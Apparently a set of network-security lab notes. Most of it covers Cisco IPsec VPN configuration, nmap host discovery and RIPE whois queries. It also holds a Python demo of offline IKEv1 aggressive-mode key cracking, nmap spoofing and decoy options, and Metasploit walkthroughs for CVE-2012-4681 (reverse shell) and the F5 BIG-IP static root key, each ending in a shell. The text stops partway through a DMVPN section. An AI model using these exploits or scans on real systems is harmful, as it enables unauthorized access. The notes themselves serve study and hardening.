# Dynamic and static VTI


Topology

[PC-1]----[ROUTER-1]----[ROUTER-2]----[PC-2]

[PC-1] eth0: 192.168.1.1/24

[ROUTER-1] fa0/1: 192.168.1.254/24
[ROUTER-1] fa0/0: 12.12.12.1/24
[ROUTER-1] vt1: 192.168.0.1/24 (virtual-template1)
[ROUTER-1] lo0: 192.168.0.1/24

[ROUTER-2] lo0: 192.168.0.2/24
[ROUTER-2] tu0: 192.168.0.2/24
[ROUTER-2] fa0/0: 12.12.12.2/24
[ROUTER-2] fa0/1: 192.168.2.254/24

[PC-2] eth0: 192.168.2.1/24

Dynamic VTI (Hub)

The hub cannot initiate a site-to-site VPN because it does not know the peer IP address; a spoke has to bring the tunnel up. The keyring below accepts any peer (address 0.0.0.0 0.0.0.0), so one pre-shared key serves every spoke: keep aggressive mode disabled, since an IKEv1 aggressive-mode responder sends HASH_R in the clear and a captured exchange can then be brute-forced offline against that shared key.

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto keyring KEYRING
ROUTER-1(conf-keyring)# pre-shared-key address 0.0.0.0 0.0.0.0 key 0 SECRET_KEY
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto isakmp profile PROFILE
ROUTER-1(conf-isa-prof)# match identity address 0.0.0.0 0.0.0.0
ROUTER-1(conf-isa-prof)# keyring KEYRING
ROUTER-1(conf-isa-prof)# virtual-template 1
ROUTER-1(config)# crypto ipsec profile PROFILE
ROUTER-1(ipsec-profile)# set transform-set TRANSFORM_SET
ROUTER-1(ipsec-profile)# set isakmp-profile PROFILE
ROUTER-1(ipsec-profile)# set pfs group2
ROUTER-1(config)# interface lo0
ROUTER-1(config-if)# ip address 192.168.0.1 255.255.255.0
ROUTER-1(config)# interface fa0/0
ROUTER-1(config-if)# ip nat outside
ROUTER-1(config)# interface fa0/1
ROUTER-1(config-if)# ip nat inside
ROUTER-1(config)# interface virtual-template1 type tunnel
ROUTER-1(config-if)# ip unnumbered lo0
ROUTER-1(config-if)# tunnel source fa0/0
ROUTER-1(config-if)# tunnel mode ipsec ipv4
ROUTER-1(config-if)# tunnel protection ipsec profile PROFILE
ROUTER-1(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.2
ROUTER-1(config)# ip access-list extended ACL_NAT
ROUTER-1(config-ext-nacl)# permit ip any any
ROUTER-1(config)# ip nat inside source list ACL_NAT interface fa0/0 overload
ROUTER-1(config)# router ospf 1
ROUTER-1(config-router)# network 192.168.0.0 0.0.255.255 area 0
ROUTER-1(config-router)# passive-interface default
ROUTER-1(config-router)# no passive-interface virtual-template1

Static VTI (Spoke)

The spokes initiate the site-to-site VPN.

ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto ipsec profile PROFILE
ROUTER-2(ipsec-profile)# set transform-set TRANSFORM_SET
ROUTER-2(ipsec-profile)# set pfs group2
ROUTER-2(config)# interface lo0
ROUTER-2(config-if)# ip address 192.168.0.2 255.255.255.0
ROUTER-2(config)# interface fa0/0
ROUTER-2(config-if)# ip nat outside
ROUTER-2(config)# interface fa0/1
ROUTER-2(config-if)# ip nat inside
ROUTER-2(config)# interface tu0
ROUTER-2(config-if)# ip unnumbered lo0
ROUTER-2(config-if)# tunnel source fa0/0
ROUTER-2(config-if)# tunnel destination 12.12.12.1
ROUTER-2(config-if)# tunnel mode ipsec ipv4
ROUTER-2(config-if)# tunnel protection ipsec profile PROFILE
ROUTER-2(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.1
ROUTER-2(config)# ip access-list extended ACL_NAT
ROUTER-2(config-ext-nacl)# permit ip any any
ROUTER-2(config)# ip nat inside source list ACL_NAT interface fa0/0 overload
ROUTER-2(config)# router ospf 1
ROUTER-2(config-router)# network 192.168.0.0 0.0.255.255 area 0
ROUTER-2(config-router)# passive-interface default
ROUTER-2(config-router)# no passive-interface tu0

# GRE over IPsec


Topology

[PC-1]----[ROUTER-1]----[ROUTER-2]----[PC-2]

[PC-1] eth0: 192.168.1.1/24

[ROUTER-1] fa0/1: 192.168.1.254/24
[ROUTER-1] fa0/0: 12.12.12.1/24
[ROUTER-1] tu0: 12.0.0.1/24

[ROUTER-2] tu0: 12.0.0.2/24
[ROUTER-2] fa0/0: 12.12.12.2/24
[ROUTER-2] fa0/1: 192.168.2.254/24

[PC-2] eth0: 192.168.2.1/24

Using static crypto maps

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.2
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# ip access-list extended CRYPTO_ACL
ROUTER-1(config-ext-nacl)# permit gre host 12.12.12.1 host 12.12.12.2
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp
ROUTER-1(config-crypto-map)# set peer 12.12.12.2
ROUTER-1(config-crypto-map)# match address CRYPTO_ACL
ROUTER-1(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-1(config-crypto-map)# set pfs group2
ROUTER-1(config)# interface fa0/0
ROUTER-1(config-if)# crypto map CRYPTO_MAP
ROUTER-1(config-if)# ip nat outside
ROUTER-1(config)# interface fa0/1
ROUTER-1(config-if)# ip nat inside
ROUTER-1(config)# interface tu0
ROUTER-1(config-if)# ip address 12.0.0.1 255.255.255.0
ROUTER-1(config-if)# tunnel source fa0/0
ROUTER-1(config-if)# tunnel destination 12.12.12.2
ROUTER-1(config)# ip route 192.168.2.0 255.255.255.0 12.0.0.2
ROUTER-1(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.2
ROUTER-1(config)# ip access-list extended ACL_NAT
ROUTER-1(config-ext-nacl)# permit ip any any
ROUTER-1(config)# ip nat inside source list ACL_NAT interface fa0/0 overload
ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# ip access-list extended CRYPTO_ACL
ROUTER-2(config-ext-nacl)# permit gre host 12.12.12.2 host 12.12.12.1
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp
ROUTER-2(config-crypto-map)# set peer 12.12.12.1
ROUTER-2(config-crypto-map)# match address CRYPTO_ACL
ROUTER-2(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-2(config-crypto-map)# set pfs group2
ROUTER-2(config)# interface fa0/0
ROUTER-2(config-if)# crypto map CRYPTO_MAP
ROUTER-2(config-if)# ip nat outside
ROUTER-2(config)# interface fa0/1
ROUTER-2(config-if)# ip nat inside
ROUTER-2(config)# interface tu0
ROUTER-2(config-if)# ip address 12.0.0.2 255.255.255.0
ROUTER-2(config-if)# tunnel source fa0/0
ROUTER-2(config-if)# tunnel destination 12.12.12.1
ROUTER-2(config)# ip route 192.168.1.0 255.255.255.0 12.0.0.1
ROUTER-2(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.1
ROUTER-2(config)# ip access-list extended ACL_NAT
ROUTER-2(config-ext-nacl)# permit ip any any
ROUTER-2(config)# ip nat inside source list ACL_NAT interface fa0/0 overload

Using profiles

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.2
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto ipsec profile PROFILE
ROUTER-1(config-profile)# set transform-set TRANSFORM_SET
ROUTER-1(config-profile)# set pfs group2
ROUTER-1(config)# interface fa0/0
ROUTER-1(config-if)# ip nat outside
ROUTER-1(config)# interface fa0/1
ROUTER-1(config-if)# ip nat inside
ROUTER-1(config)# interface tu0
ROUTER-1(config-if)# ip address 12.0.0.1 255.255.255.0
ROUTER-1(config-if)# tunnel source fa0/0
ROUTER-1(config-if)# tunnel destination 12.12.12.2
ROUTER-1(config-if)# tunnel protection ipsec profile PROFILE
ROUTER-1(config)# ip route 192.168.2.0 255.255.255.0 12.0.0.2
ROUTER-1(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.2
ROUTER-1(config)# ip access-list extended ACL_NAT
ROUTER-1(config-ext-nacl)# permit ip any any
ROUTER-1(config)# ip nat inside source list ACL_NAT interface fa0/0 overload
ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto ipsec profile PROFILE
ROUTER-2(ipsec-profile)# set transform-set TRANSFORM_SET
ROUTER-2(ipsec-profile)# set pfs group2
ROUTER-2(config)# interface fa0/0
ROUTER-2(config-if)# ip nat outside
ROUTER-2(config)# interface fa0/1
ROUTER-2(config-if)# ip nat inside
ROUTER-2(config)# interface tu0
ROUTER-2(config-if)# ip address 12.0.0.2 255.255.255.0
ROUTER-2(config-if)# tunnel source fa0/0
ROUTER-2(config-if)# tunnel destination 12.12.12.1
ROUTER-2(config-if)# tunnel protection ipsec profile PROFILE
ROUTER-2(config)# ip route 192.168.1.0 255.255.255.0 12.0.0.1
ROUTER-2(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.1
ROUTER-2(config)# ip access-list extended ACL_NAT
ROUTER-2(config-ext-nacl)# permit ip any any
ROUTER-2(config)# ip nat inside source list ACL_NAT interface fa0/0 overload

# Dynamic and static crypto maps

Topology

[PC-1]----[ROUTER-1]----[ROUTER-2]----[PC-2]

[PC-1] eth0: 192.168.1.1/24

[ROUTER-1] fa0/1: 192.168.1.254/24
[ROUTER-1] fa0/0: 12.12.12.1/24

[ROUTER-2] fa0/0: 12.12.12.2/24
[ROUTER-2] fa0/1: 192.168.2.254/24

[PC-2] eth0: 192.168.2.1/24

Dynamic crypto map (Hub)

The hub cannot initiate a site-to-site VPN because it does not know the peer IP address; a spoke has to bring the tunnel up. Because the hub's pre-shared key is bound to 0.0.0.0 0.0.0.0, every spoke authenticates with the same secret and a compromised spoke can impersonate any other spoke to the hub; per-peer keys (a keyring with one entry per spoke address) or certificates limit that exposure.

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto isakmp key 0 SECRET_KEY address 0.0.0.0 0.0.0.0
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto dynamic-map DYNAMIC-MAP 1
ROUTER-1(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-1(config-crypto-map)# set pfs group2
ROUTER-1(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp dynamic DYNAMIC-MAP
ROUTER-1(config)# interface fa0/0
ROUTER-1(config-if)# crypto map CRYPTO_MAP
ROUTER-1(config-if)# ip nat outside
ROUTER-1(config)# interface fa0/1
ROUTER-1(config-if)# ip nat inside
ROUTER-1(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.2
ROUTER-1(config)# ip access-list extended ACL_NONAT
ROUTER-1(config-ext-nacl)# deny ip 192.168.1.0 0.0.0.255 192.168.0.0 0.0.255.255
ROUTER-1(config-ext-nacl)# permit ip any any
ROUTER-1(config)# ip nat inside source list ACL_NONAT interface fa0/0 overload

Static crypto map (Spoke)

The spokes initiate the site-to-site VPN.

ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# ip access-list extended CRYPTO_ACL
ROUTER-2(config-ext-nacl)# permit ip 192.168.2.0 0.0.0.255 192.168.1.0 0.0.0.255
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp
ROUTER-2(config-crypto-map)# set peer 12.12.12.1
ROUTER-2(config-crypto-map)# match address CRYPTO_ACL
ROUTER-2(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-2(config-crypto-map)# set pfs group2
ROUTER-2(config)# interface fa0/0
ROUTER-2(config-if)# crypto map CRYPTO_MAP
ROUTER-2(config-if)# ip nat outside
ROUTER-2(config)# interface fa0/1
ROUTER-2(config-if)# ip nat inside
ROUTER-2(config)# ip route 192.168.1.0 255.255.255.0 12.12.12.1
ROUTER-2(config)# ip access-list extended ACL_NONAT
ROUTER-2(config-ext-nacl)# deny ip 192.168.2.0 0.0.0.255 192.168.1.0 0.0.0.255
ROUTER-2(config-ext-nacl)# permit ip any any
ROUTER-2(config)# ip nat inside source list ACL_NONAT interface fa0/0 overload
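Why every ISAKMP policy in these notes carries "crypto isakmp aggressive-mode disable", shown as an added example that is not part of the original notes: with IKEv1 pre-shared keys, an aggressive-mode responder sends HASH_R unencrypted in its first message, and everything HASH_R is computed over (both nonces, both DH public values, both cookies, the initiator's SA proposal and the responder's ID) is also on the wire. Whoever captures the two messages can test candidate keys offline, which is what the psk-crack tool from the ike-scan package does. The wildcard key on the dynamic-map hub makes this worse, because one key serves every spoke. The formulas are RFC 2409 section 5.4; every byte value below is a constructed placeholder, not a real capture.

```python
import hashlib
import hmac

# "hash sha" in the ISAKMP policy makes the IKEv1 prf HMAC-SHA1 (RFC 2409 section 5).
def prf(key, data):
    return hmac.new(key, data, hashlib.sha1).digest()

def skeyid_psk(psk, ni, nr):
    """SKEYID = prf(pre-shared-key, Ni_b | Nr_b)   (RFC 2409 section 5.4, PSK auth)."""
    return prf(psk, ni + nr)

def hash_r(psk, ex):
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    skeyid = skeyid_psk(psk, ex["ni"], ex["nr"])
    return prf(skeyid, ex["gxr"] + ex["gxi"] + ex["cky_r"] + ex["cky_i"]
               + ex["sai_b"] + ex["idir_b"])

def aggressive_mode_capture(psk):
    """Constructed stand-in for a sniffed IKEv1 aggressive-mode exchange.

    Message 1 (initiator -> responder): SAi_b, g^xi, Ni, IDii
    Message 2 (responder -> initiator): SAr_b, g^xr, Nr, IDir, HASH_R
    None of this is encrypted.  The DH public values and nonces are fixed dummy
    bytes (constructed, not a real DH exchange): the attack never needs the
    private exponents, only the bytes that went over the wire.
    """
    ex = {
        "cky_i": bytes.fromhex("0102030405060708"),                # initiator cookie
        "cky_r": bytes.fromhex("1112131415161718"),                # responder cookie
        "sai_b": b"constructed SAi_b (body of the initiator's SA payload)",
        "gxi": hashlib.sha256(b"constructed g^xi").digest() * 4,  # 128 bytes = group 2 size
        "gxr": hashlib.sha256(b"constructed g^xr").digest() * 4,
        "ni": hashlib.sha256(b"constructed Ni").digest()[:20],
        "nr": hashlib.sha256(b"constructed Nr").digest()[:20],
        # IDir body: type ID_IPV4_ADDR (1), protocol 0, port 0, then 12.12.12.1
        "idir_b": bytes([1, 0, 0, 0]) + bytes([12, 12, 12, 1]),
    }
    ex["hash_r"] = hash_r(psk, ex)   # what the responder put in message 2, in the clear
    return ex

def crack_psk(ex, wordlist):
    """Offline dictionary attack: recompute HASH_R per candidate and compare.

    In main mode the same HASH_R travels inside the encrypted message 6, under a
    key derived from g^xy, so a passive observer has nothing to compare against.
    """
    for candidate in wordlist:
        if hmac.compare_digest(hash_r(candidate, ex), ex["hash_r"]):
            return candidate
    return None

if __name__ == "__main__":
    capture = aggressive_mode_capture(b"SECRET_KEY")   # the key used in the notes above
    print(crack_psk(capture, [b"cisco", b"cisco123", b"SECRET_KEY"]))
```

Main mode is not magic: it only moves HASH_I/HASH_R under the SKEYID_e encryption, so a passive attacker must break the Diffie-Hellman exchange first. A guessable key is still a guessable key for anyone who can reach the hub and try IKE directly, which is the second reason the hub-side wildcard key deserves a long random secret.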

# Nmap Host Discovery

Source file

# cat ip_list.txt
1.1.1.0
1.1.1.1
1.1.1.2
1.1.1.3
1.1.1.4
1.1.1.5
1.1.1.6
1.1.1.7
1.1.1.8
1.1.1.9
# nmap -n -sL -iL ip_list.txt

Reverse DNS resolution (every lookup tells the resolver which addresses you are scanning; add -n when that matters)

# cat /etc/resolv.conf
nameserver 8.8.8.8
# nmap --dns-servers 8.8.4.4 -sL 1.1.1.0/24

Ping scan only: -sP (-sn in current Nmap releases; -sP is still accepted)

ICMP echo request -PE:

# nmap --dns-servers 8.8.4.4 -sP -PE 1.1.1.1

ICMP timestamp request -PP:

# nmap --dns-servers 8.8.4.4 -sP -PP 1.1.1.1

ICMP address mask request -PM:

# nmap --dns-servers 8.8.4.4 -sP -PM 1.1.1.1

TCP SYN ping -PS:

# nmap --dns-servers 8.8.4.4 -sP -PS80 1.1.1.1

TCP ACK ping -PA:

# nmap --dns-servers 8.8.4.4 -sP -PA80 1.1.1.1

UDP ping -PU:

# nmap --dns-servers 8.8.4.4 -sP -PU53 1.1.1.1

IP protocol ping -PO:

# nmap --dns-servers 8.8.4.4 -sP -POicmp,igmp 1.1.1.1

ARP ping -PR (nmap uses this by default for targets on the local Ethernet segment):

# nmap --dns-servers 192.168.1.10 -sP -PR 192.168.1.1

Related options:

--verbose
--source-port _port_
-n disables DNS resolution
--data-length _length_ adds random bytes to every packet
--ttl _value_
-T4, -T5 speed up scanning (-T3 is the default)
--max-parallelism _value_
--max-rtt-timeout _value_ how long nmap waits for a ping response
-oA, -oN, -oG, -oX different outputs
--packet-trace provides more detail
-D _decoy1_[,_decoy2_,...] adds decoy source addresses (noise in the target's logs)

Spoof the source address with -e _intf_ -S _spoofed-ip_ (replies go to the spoofed address, so you only see results if you can sniff that path):

# nmap --dns-servers 8.8.4.4 -sP -PS80 -e ppp0 -S 2.2.2.2 1.1.1.1

Skip the discovery stage with -PN (-Pn in current releases) and go straight to the default scanning stage

Every target is treated as up, whether or not it answers probes:

# nmap -PN 1.1.1.1
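The usual next step after a ping sweep is to feed the hosts that answered into a port scan with -iL, as with ip_list.txt at the top of this section. The grepable output (-oG) listed under "Related options" is the easiest format to do that from. Below is an added example (not part of the original notes) that parses -oG output and emits an -iL target list; the sample output is constructed to match the real "Host: <ip> (<name>)<TAB>Status: <state>" layout, not captured from a scan.

```python
import re

# Constructed sample of nmap grepable output (-oG) from a ping scan; real files
# carry the same "Host: <ip> (<name>)<TAB>Status: <state>" lines.  Down hosts
# are only listed when nmap runs with --verbose.
SAMPLE_OG = """\
# Nmap 7.94 scan initiated Mon Jan  1 12:00:00 2024 as: nmap -sn -PE -v -oG - 1.1.1.0/29
Host: 1.1.1.0 ()\tStatus: Down
Host: 1.1.1.1 (one.one.one.one)\tStatus: Up
Host: 1.1.1.2 ()\tStatus: Down
Host: 1.1.1.3 (three.example.net)\tStatus: Up
Host: 1.1.1.4 ()\tStatus: Up
Host: 1.1.1.5 ()\tStatus: Down
Host: 1.1.1.6 ()\tStatus: Down
Host: 1.1.1.7 ()\tStatus: Down
# Nmap done at Mon Jan  1 12:00:02 2024 -- 8 IP addresses (3 hosts up) scanned in 2.10 seconds
"""

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)")

def parse_grepable(text):
    """Return one dict per Host: line, e.g. {'ip': ..., 'hostname': ..., 'status': 'Up'}."""
    hosts = []
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue                      # "# Nmap ..." header and trailer lines
        entry = {"ip": m.group(1), "hostname": m.group(2) or None}
        # The remaining tab-separated fields are "Status: Up", "Ports: ...", etc.
        for field in line.split("\t")[1:]:
            key, _, value = field.partition(":")
            entry[key.strip().lower()] = value.strip()
        hosts.append(entry)
    return hosts

def live_hosts(text):
    """Addresses whose Status field is Up, in file order."""
    return [h["ip"] for h in parse_grepable(text) if h.get("status") == "Up"]

def target_list(text):
    """Live hosts one per line: the format -iL reads (compare ip_list.txt above)."""
    return "".join(ip + "\n" for ip in live_hosts(text))

def write_target_list(text, path):
    """Write the -iL list to disk; pass the path to nmap -iL for the port scan."""
    with open(path, "w") as f:
        f.write(target_list(text))

if __name__ == "__main__":
    print(target_list(SAMPLE_OG), end="")
```

Keying the dict on the field name means the same parser copes with port-scan output, where the fields after the host are "Ports:" and "Ignored State:" rather than "Status:".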

# RIPE whois queries

Introduction

https://www.ripe.net/data-tools/support/documentation/queries-ref-card


Direct queries

# whois -B -h whois.ripe.net 217.148.69.0
# whois -B -h whois.ripe.net 217.148.69.0/24
# whois -B -h whois.ripe.net CAIXA
# whois -B -h whois.ripe.net EdJ9-RIPE
# whois -B -h whois.ripe.net edejuan@lacaixa.es
# whois -B -h whois.ripe.net LACAIXA-MNT
# whois -B -h whois.ripe.net AS16383

Inverse queries

# whois -B -h whois.ripe.net -i person EdJ9-RIPE
# whois -B -h whois.ripe.net -i notify edejuan@lacaixa.es
# whois -B -h whois.ripe.net -i mnt-by LACAIXA-MNT
# whois -B -h whois.ripe.net -i origin AS16383
# whois -B -h whois.ripe.net -i nserver ns1.lacaixa.com

Commonly used flags (-B, used in every query above, turns off the filtering that hides e-mail attributes)

# whois -B -h whois.ripe.net -r 217.148.69.0 ! Disables recursive search
# whois -B -h whois.ripe.net -L 217.148.69.0 ! All less specific objects
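What comes back from whois.ripe.net is RPSL: one "attribute: value" per line, objects separated by blank lines, server comments prefixed with "%", and long values continued on indented lines. The inverse queries above (-i mnt-by, -i origin, ...) are server-side lookups by attribute value; the added example below (not part of the original notes) parses a saved response and performs the same lookups locally, which is handy when you have pulled a large block of objects once and want to cross-reference them offline. The response text is constructed (documentation prefix 192.0.2.0/24, documentation ASN AS64496, invented handles), not a real RIPE record.

```python
# Constructed RIPE-style response (RPSL); not real registry data.
SAMPLE_RESPONSE = """\
% This is the RIPE Database query service.
% The objects are in RPSL format.

% Information related to '192.0.2.0 - 192.0.2.255'

inetnum:        192.0.2.0 - 192.0.2.255
netname:        EXAMPLE-NET
descr:          Example network (constructed sample,
                not a real allocation)
country:        NL
admin-c:        EX1-RIPE
tech-c:         EX1-RIPE
status:         ASSIGNED PA
mnt-by:         EXAMPLE-MNT
mnt-by:         OTHER-MNT
source:         RIPE

route:          192.0.2.0/24
descr:          Example route
origin:         AS64496
mnt-by:         EXAMPLE-MNT
source:         RIPE

person:         Example Person
address:        Example Street 1
nic-hdl:        EX1-RIPE
mnt-by:         EXAMPLE-MNT
source:         RIPE
"""

def parse_rpsl(text):
    """Split a whois response into objects; each object is an ordered list of
    (attribute, value) pairs, because attributes such as mnt-by repeat."""
    objects, current = [], []
    for raw in text.splitlines():
        if raw.startswith("%") or raw.startswith("#"):
            continue                                  # server comments / info
        if not raw.strip():
            if current:                               # blank line ends an object
                objects.append(current)
                current = []
            continue
        if raw[0] in " \t+" and current:              # continuation of previous value
            key, value = current[-1]
            cont = raw[1:].strip() if raw[0] == "+" else raw.strip()
            current[-1] = (key, (value + " " + cont).strip())
            continue
        key, _, value = raw.partition(":")
        current.append((key.strip(), value.strip()))
    if current:
        objects.append(current)
    return objects

def object_class(obj):
    """The first attribute of an RPSL object names its class (inetnum, route, person, ...)."""
    return obj[0][0]

def attr(obj, key):
    """All values of one attribute, in order (empty list if absent)."""
    return [v for k, v in obj if k == key]

def inverse_lookup(objects, key, value):
    """Local equivalent of 'whois -i <key> <value>': objects carrying that attribute value."""
    return [o for o in objects if value in attr(o, key)]

if __name__ == "__main__":
    objs = parse_rpsl(SAMPLE_RESPONSE)
    for o in inverse_lookup(objs, "mnt-by", "EXAMPLE-MNT"):
        print(object_class(o), attr(o, object_class(o))[0])
```

The parser deliberately keeps duplicate attributes instead of collapsing them into a dict, since a lookup such as "which objects does OTHER-MNT also protect" depends on seeing every mnt-by line.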

# Exploiting Java 0day

Introduction

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-4681

Metasploit

# msfconsole

msf > use exploit/multi/browser/java_jre17_exec
msf  exploit(java_jre17_exec) > set payload java/shell/reverse_tcp
msf  exploit(java_jre17_exec) > set srvhost 192.168.0.2
msf  exploit(java_jre17_exec) > set lhost 192.168.0.2
msf  exploit(java_jre17_exec) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.2:4444 
msf  exploit(java_jre17_exec) > [*] Using URL: http://192.168.0.2:8080/UxFhxobmVYzm
[*] Server started.
[*] 192.168.0.1      java_jre17_exec - Java 7 Applet Remote Code Execution handling request
[*] 192.168.0.1      java_jre17_exec - Sending Applet.jar
[*] 192.168.0.1      java_jre17_exec - Sending Applet.jar
[*] 192.168.0.1      java_jre17_exec - Sending Applet.jar
[*] Sending stage (2976 bytes) to 192.168.0.1
[*] Command shell session 1 opened (192.168.0.2:4444 -> 192.168.0.1:1139)

msf  exploit(java_jre17_exec) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\User\Desktop>

# Exploiting F5 BIG-IP SSH vulnerability

Introduction

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1493
http://support.f5.com/kb/en-us/solutions/public/13000/600/sol13600.html

Option 1: Command-line

# cat f5_private_key 
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----
# chmod 0600 f5_private_key
# ssh -i f5_private_key root@192.168.1.1
[root@F5-BIG-IP:Active] config # bigpipe platform | grep Platform
|     BIOS revision: F5 Platform: C103 OBJ-0335-01 BIOS (build: 130) Date: 09/12/09
[root@F5-BIG-IP:Active] config # bigpipe version | grep Version
BIG-IP Version 10.2.2 969.0
[root@F5-BIG-IP:Active] config # whoami
root

Option 2: PuTTY

- Use PuTTYGen to obtain a private ppk file from f5_private_key
- Execute PuTTY
- Connection/SSH/Auth/Private key file for authentication/Browse...: C:\f5_private_key.ppk
- Session/Host Name (or IP address) and Port: 192.168.1.1:22
- Open

login as: root
Authenticating with public key "imported-openssh-key"
[root@F5-BIG-IP:Active] config # whoami
root

Option 3: Metasploit

# msfconsole

msf > use exploit/linux/ssh/f5_bigip_known_privkey
msf  exploit(f5_bigip_known_privkey) > show payloads
msf  exploit(f5_bigip_known_privkey) > set payload cmd/unix/interact
msf  exploit(f5_bigip_known_privkey) > set lhost 192.168.1.2
msf  exploit(f5_bigip_known_privkey) > set rhost 192.168.1.1
msf  exploit(f5_bigip_known_privkey) > exploit

[+] Successful login
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.2:42298 -> 192.168.1.1:22)

whoami
root

# Dynamic Multipoint VPN (DMVPN)

Topology

[ROUTER-0]-----[ROUTER-1]
[ROUTER-0]-----[ROUTER-2]
[ROUTER-0]-----[ROUTER-3]

[ROUTER-1] is the NHRP server.
[ROUTER-2] and [ROUTER-3] are the NHRP clients.

[ROUTER-0] fa0/1: 192.168.1.254/24
[ROUTER-0] fa0/2: 192.168.2.254/24
[ROUTER-0] fa0/3: 192.168.3.254/24

[ROUTER-1] fa0/0: 192.168.1.1/24
[ROUTER-2] fa0/0: 192.168.2.2/24
[ROUTER-3] fa0/0: 192.168.3.3/24

ROUTER-1 configuration

Network

ROUTER-1(config)# interface FastEthernet0/0
ROUTER-1(config-if)# ip address 192.168.1.1 255.255.255.0
